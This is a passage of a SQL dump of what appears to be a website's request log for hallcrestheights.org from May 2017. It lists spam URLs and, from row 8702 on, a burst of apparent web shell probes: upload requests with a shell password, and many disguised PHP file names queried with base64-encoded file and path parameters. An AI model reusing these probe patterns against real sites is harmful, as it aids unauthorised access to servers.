00:00:00'),(8635,'http://www.hallcrestheights.org/pcscqruf-i20162635-unpkw-k44780-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',2,0,'2017-05-03 04:07:10','0000-00-00 00:00:00'),(8636,'http://www.hallcrestheights.org/bsoapaza-k28501-psta-sgmhcqc-i20162628-mckfrdtf-kgpvbchs/',NULL,'','',2,0,'2017-05-03 04:36:21','0000-00-00 00:00:00'),(8637,'http://www.hallcrestheights.org/dvisciwb-vwkux-i20162630-k29480-krbzomsm-vuclzup-hvqa-wuoxz.htm',NULL,'','',2,0,'2017-05-03 04:37:20','0000-00-00 00:00:00'),(8638,'http://www.hallcrestheights.org/i20162630-ryvh-rhmqtyy-k40732-sllge-ajanpd-mefnxhq.htm',NULL,'','',2,0,'2017-05-03 04:38:06','0000-00-00 00:00:00'),(8639,'http://www.hallcrestheights.org/k35180-edzvdlqc-i20162629-omnnm-mcawvbfu-japyvrl.htm',NULL,'','',2,0,'2017-05-03 04:53:15','0000-00-00 00:00:00'),(8640,'http://www.hallcrestheights.org/fadlaj-fnlgfp-cvwgmy-hdec-k27976-wxbdeu-i20162637-dkovfi-ibptq.htm',NULL,'','',2,0,'2017-05-03 05:02:45','0000-00-00 00:00:00'),(8641,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-i20162637-yuuh-vfcyzls-k32477-xxqroxae/',NULL,'','',2,0,'2017-05-03 05:45:46','0000-00-00 00:00:00'),(8642,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-i20162635-cqcm-k4477-ckfrdtf-kgpvbchs-iwhorklv/',NULL,'','',2,0,'2017-05-03 06:17:25','0000-00-00 00:00:00'),(8643,'http://www.hallcrestheights.org/oiyizgol-i20162629-k8081-rcmw-fbsnopd-gfnhskrl/',NULL,'','',2,0,'2017-05-03 06:34:36','0000-00-00 00:00:00'),(8644,'http://www.hallcrestheights.org/i20162634-oiyiz-golrcm-wfbsn-opdg-fnhskrl-k28517-jrgfctfz/',NULL,'','',2,0,'2017-05-03 07:07:53','0000-00-00 00:00:00'),(8645,'http://www.hallcrestheights.org/htxwhyk-i20162629-k57653-rsvsv-hudykb-qxdosf/',NULL,'','',2,0,'2017-05-03 07:19:02','0000-00-00 00:00:00'),(8646,'http://www.hallcrestheights.org/k35980-dvisciwb-vwkux-krbzomsm-vuclzup-i20162629-hvqa.htm',NULL,'','',2,0,'2017-05-03 07:56:16','0000-00-00 00:00:00'),(8647,'http://www.hallcrestheights.org/i20162636-kzpffms-k11933-xklrd-edhwge-fvbbgz/',NULL,'','',2,0,'2017-05-03 08:08:26','0000-00-00 00:00:00'),(8648,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-i20162636-k52924-uourxivl-btrhnn-mtqzk.htm',NULL,'','',2,0,'2017-05-03 08:12:31','0000-00-00 00:00:00'),(8649,'http://www.hallcrestheights.org/i20162632-qlbowc-iggeceay-afxr-k6709-glnik-ghhm-bbxpges-mrcaizt/',NULL,'','',2,0,'2017-05-03 08:56:01','0000-00-00 00:00:00'),(8650,'http://www.hallcrestheights.org/xhajvqlw-k60361-czbi-qsosqxo-qkgqaqyd-i20162634-cptznzvt/',NULL,'','',3,0,'2017-05-03 09:01:04','0000-00-00 00:00:00'),(8651,'http://www.hallcrestheights.org/yembjvh-i20162629-tqqdc-kzfltz-terqbw-nswns-k57353-njpl/',NULL,'','',2,0,'2017-05-03 09:11:27','0000-00-00 00:00:00'),(8652,'http://www.hallcrestheights.org/i20162628-k54008-mrcqgbe-ifuwgrab-tnwyrqse-mgwkowh.htm',NULL,'','',2,0,'2017-05-03 09:12:32','0000-00-00 00:00:00'),(8653,'http://www.hallcrestheights.org/k40300-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-i20162629-dkov.htm',NULL,'','',2,0,'2017-05-03 09:18:00','0000-00-00 00:00:00'),(8654,'http://www.hallcrestheights.org/k57253-qlbowci-ggece-ayafxr-glnikg-i20162629-hhmbb-xpge-smrcai/',NULL,'','',2,0,'2017-05-03 10:05:18','0000-00-00 00:00:00'),(8655,'http://www.hallcrestheights.org/i20162636-soegszx-k32633-yifet-vtndyu-uhvfcy/',NULL,'','',2,0,'2017-05-03 10:09:11','0000-00-00 00:00:00'),(8656,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-i20162635-dgfnh-k23629-skrl-jrgfctf-zfiwxwm/',NULL,'','',2,0,'2017-05-03 10:10:51','0000-00-00 00:00:00'),(8657,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-i20162635-vfvt-zpxbxkc-k25177-wjybtylw-osduieqg/',NULL,'','',1,0,'2017-05-03 10:48:59','0000-00-00 00:00:00'),(8658,'http://www.hallcrestheights.org/i20162632-ajqxxu-k39689-cuzaofif-ephi-ijimj/',NULL,'','',2,0,'2017-05-03 10:54:17','0000-00-00 00:00:00'),(8659,'http://www.hallcrestheights.org/soegszxy-k28681-ifet-vtndyuu-hvfcyzls-i20162629-xxqroxae/',NULL,'','',2,0,'2017-05-03 10:58:04','0000-00-00 00:00:00'),(8660,'http://www.hallcrestheights.org/k12580-dvisciwb-i20162631-vwkux-krbzomsm-vuclzup-hvqa.htm',NULL,'','',2,0,'2017-05-03 11:29:12','0000-00-00 00:00:00'),(8661,'http://www.hallcrestheights.org/k51325-qlbo-wciggec-i20162637-eayafxr-glnik-ghhmb/',NULL,'','',2,0,'2017-05-03 12:03:06','0000-00-00 00:00:00'),(8662,'http://www.hallcrestheights.org/i20162635-soegs-zxyife-k3877-tvtnd-yuuh-vfcyzls/',NULL,'','',3,0,'2017-05-03 12:06:19','0000-00-00 00:00:00'),(8663,'http://www.hallcrestheights.org/k6601-yembjvht-qqdc-kzfltzt-i20162628-erqbwnsw-nsnjplpf-trrj-ncyp/',NULL,'','',3,0,'2017-05-03 12:09:01','0000-00-00 00:00:00'),(8664,'http://www.hallcrestheights.org/i20162632-ixnmue-ahwhio-zhjxbn-wpge-yooayi-kukssz-k32836-qceba.htm',NULL,'','',2,0,'2017-05-03 12:13:48','0000-00-00 00:00:00'),(8665,'http://www.hallcrestheights.org/zmkued-tzjivy-oqxifg-xuhx-i20162636-ptvuhm-iwnzko-k50476-rpvub.htm',NULL,'','',2,0,'2017-05-03 13:22:00','0000-00-00 00:00:00'),(8666,'http://www.hallcrestheights.org/oiyiz-golrcm-i20162637-k32677-wfbsn-opdg-fnhskrl/',NULL,'','',2,0,'2017-05-03 13:23:42','0000-00-00 00:00:00'),(8667,'http://www.hallcrestheights.org/k28880-lugdltrs-mxxhy-i20162630-pzqjllzo-hnjumnt.htm',NULL,'','',2,0,'2017-05-03 13:38:28','0000-00-00 00:00:00'),(8668,'http://www.hallcrestheights.org/cwhri-wgpekz-k32377-qdwkv-umzb-saiimjz-i20162637-fozgdvdd-qjvdobkn/',NULL,'','',3,0,'2017-05-03 15:26:42','0000-00-00 00:00:00'),(8669,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-jaylrl-wfvdy-i20162637-ruqp-k27733-klsdef/',NULL,'','',2,0,'2017-05-03 16:02:06','0000-00-00 00:00:00'),(8670,'http://www.hallcrestheights.org/upttmn-k45556-beatgr-bnqcdc-ncxr-i20162629-dhcpgz.htm',NULL,'','',3,0,'2017-05-03 16:07:11','0000-00-00 00:00:00'),(8671,'http://www.hallcrestheights.org/k14480-ixnmueah-i20162629-whioz-hjxbnwpg-eyooayi.htm',NULL,'','',2,0,'2017-05-03 17:01:29','0000-00-00 00:00:00'),(8672,'http://www.hallcrestheights.org/mrcqgb-eifuwg-rabtnw-yrqs-i20162629-emgwko-k46156-whmemx-gkucy.htm',NULL,'','',2,0,'2017-05-03 18:58:54','0000-00-00 00:00:00'),(8673,'http://www.hallcrestheights.org/bsoapaz-apsta-i20162636-sgmhcq-cmckfr-dtfkg-k33233-pvbc/',NULL,'','',2,0,'2017-05-03 19:12:23','0000-00-00 00:00:00'),(8674,'http://www.hallcrestheights.org/htxwhyk-i20162636-rsvsv-hudykb-k32173-qxdosf-ietyu/',NULL,'','',2,0,'2017-05-03 19:38:08','0000-00-00 00:00:00'),(8675,'http://www.hallcrestheights.org/kzpf-i20162633-k58265-fmsxklr-dedhwge-fvbbg/',NULL,'','',2,0,'2017-05-03 19:48:22','0000-00-00 00:00:00'),(8676,'http://www.hallcrestheights.org/i20162628-k6236-dvisci-wbvwku-xkrbzo-msmv.htm',NULL,'','',2,0,'2017-05-03 20:03:14','0000-00-00 00:00:00'),(8677,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt/zpxbxkc-i20162635-wjybtylw-osduieqg-k14127-wsogxhg-pisdhtni-rmjhv/',NULL,'','',2,0,'2017-05-03 21:10:37','0000-00-00 00:00:00'),(8678,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162628-vwgmyhde-k34684-cwxbdeud.htm',NULL,'','',2,0,'2017-05-03 21:43:20','0000-00-00 00:00:00'),(8679,'http://www.hallcrestheights.org/htxwhy-k2429-krsvsvhu-dykb-i20162635-qxdos/',NULL,'','',2,0,'2017-05-03 21:47:13','0000-00-00 00:00:00'),(8680,'http://www.hallcrestheights.org/k28376-zmkued-i20162637-tzjivy-oqxifg-xuhx.htm',NULL,'','',2,0,'2017-05-03 22:19:07','0000-00-00 00:00:00'),(8681,'http://www.hallcrestheights.org/k14380-edzvdlqc-i20162631-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',2,0,'2017-05-03 22:21:41','0000-00-00 00:00:00'),(8682,'http://www.hallcrestheights.org/xhajvqlw-i20162635-czbi-qsosqxo-qkgqaqyd-cptznzvt-k18761-jqoe/',NULL,'','',2,0,'2017-05-03 22:29:22','0000-00-00 00:00:00'),(8683,'http://www.hallcrestheights.org/i20162628-pcscqru-funpkwxp-k54608-oideotwt-vsoarmo-smgepl-alhel.htm',NULL,'','',2,0,'2017-05-03 23:13:27','0000-00-00 00:00:00'),(8684,'http://www.hallcrestheights.org/k49076-vqjnys-i20162637-pvholj-peurrt-pilu.htm',NULL,'','',2,0,'2017-05-03 23:13:59','0000-00-00 00:00:00'),(8685,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-i20162634-k10384-xptvuhmi.htm',NULL,'','',2,0,'2017-05-03 23:17:21','0000-00-00 00:00:00'),(8686,'http://www.hallcrestheights.org/yembj-i20162637-k11177-vhtqqd-ckzfl-tzte/',NULL,'','',2,0,'2017-05-04 00:16:49','0000-00-00 00:00:00'),(8687,'http://www.hallcrestheights.org/xhajvqlw-i20162629-czbi-qsosqxo-qkgqaqyd-cptznzvt-k11741-jqoe/',NULL,'','',2,0,'2017-05-04 00:50:32','0000-00-00 00:00:00'),(8688,'http://www.hallcrestheights.org/ryvhrh-k45256-mqtyys-llgeaj-anpd-i20162629-mefnxh-qfhjdy-haoxr.htm',NULL,'','',2,0,'2017-05-04 01:11:25','0000-00-00 00:00:00'),(8689,'http://www.hallcrestheights.org/k36080-gnfznxvj-xpalt-itjshkyj-i20162631-yldpija.htm',NULL,'','',2,0,'2017-05-04 01:22:43','0000-00-00 00:00:00'),(8690,'http://www.hallcrestheights.org/k35180-edzvdlqc-omnnm-mcawvbfu-i20162631-japyvrl.htm',NULL,'','',2,0,'2017-05-04 01:31:45','0000-00-00 00:00:00'),(8691,'http://www.hallcrestheights.org/i20162635-xhajvq-lwczbiqs-osqx-oqkgq-k2329-aqyd/',NULL,'','',2,0,'2017-05-04 01:52:48','0000-00-00 00:00:00'),(8692,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-k11608-kecqqne-i20162629-eiaqjz.htm',NULL,'','',2,0,'2017-05-04 02:01:03','0000-00-00 00:00:00'),(8693,'http://www.hallcrestheights.org/i20162636-tkuykfj-k31373-dnjjb-ucyupa-jaylrl/',NULL,'','',2,0,'2017-05-04 02:49:11','0000-00-00 00:00:00'),(8694,'http://www.hallcrestheights.org/k11708-pcscqru-i20162629-funpkwxp-oideotwt-vsoarmo.htm',NULL,'','',2,0,'2017-05-04 02:53:11','0000-00-00 00:00:00'),(8695,'http://www.hallcrestheights.org/htxwhykr-i20162629-svsv-hudykbq-xdosfiet-yuaixnrb-k28481-dggs/',NULL,'','',2,0,'2017-05-04 03:25:05','0000-00-00 00:00:00'),(8696,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik-i20162632-ghhm-k27509-bbxpges/',NULL,'','',1,0,'2017-05-04 03:33:55','0000-00-00 00:00:00'),(8697,'http://www.hallcrestheights.org/upttmnbe-atgrb-k12380-nqcdcncx-i20162631-rdhcpgz-zdll-imvyx.htm',NULL,'','',2,0,'2017-05-04 03:49:21','0000-00-00 00:00:00'),(8698,'http://www.hallcrestheights.org/upttmn-i20162636-k29176-beatgr-bnqcdc-ncxr-dhcpgz.htm',NULL,'','',2,0,'2017-05-04 03:58:44','0000-00-00 00:00:00'),(8699,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-i20162630-k28580-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',2,0,'2017-05-04 04:23:33','0000-00-00 00:00:00'),(8700,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-i20162634-k11284-cwxbdeud.htm',NULL,'','',2,0,'2017-05-04 04:25:32','0000-00-00 00:00:00'),(8701,'http://www.hallcrestheights.org/ixnmue-i20162636-k50776-ahwhio-zhjxbn-wpge-yooayi.htm',NULL,'','',2,0,'2017-05-04 04:34:57','0000-00-00 00:00:00'),(8702,'http://hallcrestheights.org/error.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-05-04 04:39:40','0000-00-00 00:00:00'),(8703,'http://hallcrestheights.org/tmp/error.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-04 04:39:46','0000-00-00 00:00:00'),(8704,'http://hallcrestheights.org/sqlbak.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-04 04:41:18','0000-00-00 00:00:00'),(8705,'http://hallcrestheights.org/sql-bak.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:41:28','0000-00-00 00:00:00'),(8706,'http://hallcrestheights.org/email.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:41:48','0000-00-00 00:00:00'),(8707,'http://hallcrestheights.org/pols.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:42:10','0000-00-00 00:00:00'),(8708,'http://hallcrestheights.org/imdex.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:42:29','0000-00-00 00:00:00'),(8709,'http://hallcrestheights.org/ytt.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:44:51','0000-00-00 00:00:00'),(8710,'http://hallcrestheights.org/wp-coments.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-04 04:45:13','0000-00-00 00:00:00'),(8711,'http://hallcrestheights.org/tmp.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-05-04 04:46:23','0000-00-00 00:00:00'),(8712,'http://hallcrestheights.org/functions.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-04 04:46:33','0000-00-00 00:00:00'),(8713,'http://hallcrestheights.org/cache/news.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:48:34','0000-00-00 00:00:00'),(8714,'http://hallcrestheights.org/shootme.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-05-04 04:49:17','0000-00-00 00:00:00'),(8715,'http://hallcrestheights.org/configurationbak.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:49:37','0000-00-00 00:00:00'),(8716,'http://hallcrestheights.org/robots.txt.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:49:57','0000-00-00 00:00:00'),(8717,'http://hallcrestheights.org/jconfig.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:50:21','0000-00-00 00:00:00'),(8718,'http://hallcrestheights.org/media/reads.php?z3=Y1RTTmpCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:50:44','0000-00-00 00:00:00'),(8719,'http://hallcrestheights.org/media/1ndex.php?z3=Y1RTTmpCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:51:05','0000-00-00 00:00:00'),(8720,'http://hallcrestheights.org/sql_dump.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:51:53','0000-00-00 00:00:00'),(8721,'http://hallcrestheights.org/error-logs.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:53:10','0000-00-00 00:00:00'),(8722,'http://hallcrestheights.org/media/404.php?z3=Y1RTTmpCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:53:31','0000-00-00 00:00:00'),(8723,'http://hallcrestheights.org/media/tmp.php?z3=Y1RTTmpCLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:53:55','0000-00-00 00:00:00'),(8724,'http://hallcrestheights.org/log.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:54:36','0000-00-00 00:00:00'),(8725,'http://hallcrestheights.org/images/stories/0day.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:54:58','0000-00-00 00:00:00'),(8726,'http://hallcrestheights.org/includes/u2p.php?z3=Y1RTTmpCLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:55:17','0000-00-00 00:00:00'),(8727,'http://hallcrestheights.org/images/xxx.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-04 04:56:23','0000-00-00 00:00:00'),(8728,'http://hallcrestheights.org/al277.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:56:33','0000-00-00 00:00:00'),(8729,'http://hallcrestheights.org/wp-admin/options-media.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:56:53','0000-00-00 00:00:00'),(8730,'http://hallcrestheights.org/wp-content/advanced-cache.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:57:17','0000-00-00 00:00:00'),(8731,'http://hallcrestheights.org/roubt.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:57:38','0000-00-00 00:00:00'),(8732,'http://hallcrestheights.org/includes.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:57:56','0000-00-00 00:00:00'),(8733,'http://hallcrestheights.org/images/al277.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:58:14','0000-00-00 00:00:00'),(8734,'http://hallcrestheights.org/webconfig.txt.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:58:33','0000-00-00 00:00:00'),(8735,'http://hallcrestheights.org/cache/cachee.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:59:08','0000-00-00 00:00:00'),(8736,'http://hallcrestheights.org/thumb.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 04:59:25','0000-00-00 00:00:00'),(8737,'http://hallcrestheights.org/configbak.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:00:20','0000-00-00 00:00:00'),(8738,'http://hallcrestheights.org/wp-main.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:00:39','0000-00-00 00:00:00'),(8739,'http://hallcrestheights.org/robot.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:00:57','0000-00-00 00:00:00'),(8740,'http://hallcrestheights.org/install.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:01:15','0000-00-00 00:00:00'),(8741,'http://hallcrestheights.org/images/1ndex.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:02:11','0000-00-00 00:00:00'),(8742,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=Y1RTTmpCLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:02:25','0000-00-00 00:00:00'),(8743,'http://hallcrestheights.org/resd.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:02:40','0000-00-00 00:00:00'),(8744,'http://hallcrestheights.org/injctory.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:02:54','0000-00-00 00:00:00'),(8745,'http://hallcrestheights.org/mmytc.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:03:08','0000-00-00 00:00:00'),(8746,'http://hallcrestheights.org/images/laj.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:03:42','0000-00-00 00:00:00'),(8747,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:03:58','0000-00-00 00:00:00'),(8748,'http://hallcrestheights.org/wsdl.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:04:12','0000-00-00 00:00:00'),(8749,'http://hallcrestheights.org/goog1es.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:04:26','0000-00-00 00:00:00'),(8750,'http://hallcrestheights.org/wp-admin/network/rnnvhs.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:05:28','0000-00-00 00:00:00'),(8751,'http://hallcrestheights.org/wp-admin/about.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:05:35','0000-00-00 00:00:00'),(8752,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=Y1RTTmpCLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:05:49','0000-00-00 00:00:00'),(8753,'http://hallcrestheights.org/news.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:07:00','0000-00-00 00:00:00'),(8754,'http://hallcrestheights.org/SessionController.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:07:08','0000-00-00 00:00:00'),(8755,'http://hallcrestheights.org/maill.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:07:23','0000-00-00 00:00:00'),(8756,'http://hallcrestheights.org/error-log.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:07:48','0000-00-00 00:00:00'),(8757,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:08:05','0000-00-00 00:00:00'),(8758,'http://hallcrestheights.org/authenticating.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:08:24','0000-00-00 00:00:00'),(8759,'http://hallcrestheights.org/google-assist.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:08:39','0000-00-00 00:00:00'),(8760,'http://hallcrestheights.org/images/google-assist.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:08:57','0000-00-00 00:00:00'),(8761,'http://hallcrestheights.org/images/robots.txt.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:09:54','0000-00-00 00:00:00'),(8762,'http://hallcrestheights.org/elements.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:10:05','0000-00-00 00:00:00'),(8763,'http://hallcrestheights.org/xmlsrpc.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:10:26','0000-00-00 00:00:00'),(8764,'http://www.hallcrestheights.org/xhajv-i20162635-qlwczb-iqsos-qxoq-kgqaqyd-k24377-cptznzvt/',NULL,'','',2,0,'2017-05-04 05:10:31','0000-00-00 00:00:00'),(8765,'http://hallcrestheights.org/wp-cache.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:10:46','0000-00-00 00:00:00'),(8766,'http://hallcrestheights.org/images/404.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:11:04','0000-00-00 00:00:00'),(8767,'http://hallcrestheights.org/images/head.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:11:57','0000-00-00 00:00:00'),(8768,'http://hallcrestheights.org/cache/support.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:12:20','0000-00-00 00:00:00'),(8769,'http://hallcrestheights.org/RoseLeif.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:12:44','0000-00-00 00:00:00'),(8770,'http://hallcrestheights.org/Abbrevsprl.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:13:08','0000-00-00 00:00:00'),(8771,'http://hallcrestheights.org/show.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:13:32','0000-00-00 00:00:00'),(8772,'http://hallcrestheights.org/images/defau1t.php?z3=Y1RTTmpCLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:13:58','0000-00-00 00:00:00'),(8773,'http://hallcrestheights.org/cli/40dd1d.php?z3=Y1RTTmpCLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:14:24','0000-00-00 00:00:00'),(8774,'http://hallcrestheights.org/bk.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:14:37','0000-00-00 00:00:00'),(8775,'http://hallcrestheights.org/infos.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:15:00','0000-00-00 00:00:00'),(8776,'http://hallcrestheights.org/cache/defau1t.php?z3=Y1RTTmpCLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:15:10','0000-00-00 00:00:00'),(8777,'http://hallcrestheights.org/A.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:15:23','0000-00-00 00:00:00'),(8778,'http://hallcrestheights.org/bookmark.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-04 05:15:36','0000-00-00 00:00:00'),(8779,'http://hallcrestheights.org/wp-data.php?z3=Y1RTTmpCLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-04 05:16:06','0000-00-00 00:00:00'),(8780,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=Y1RTTmpCLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-04 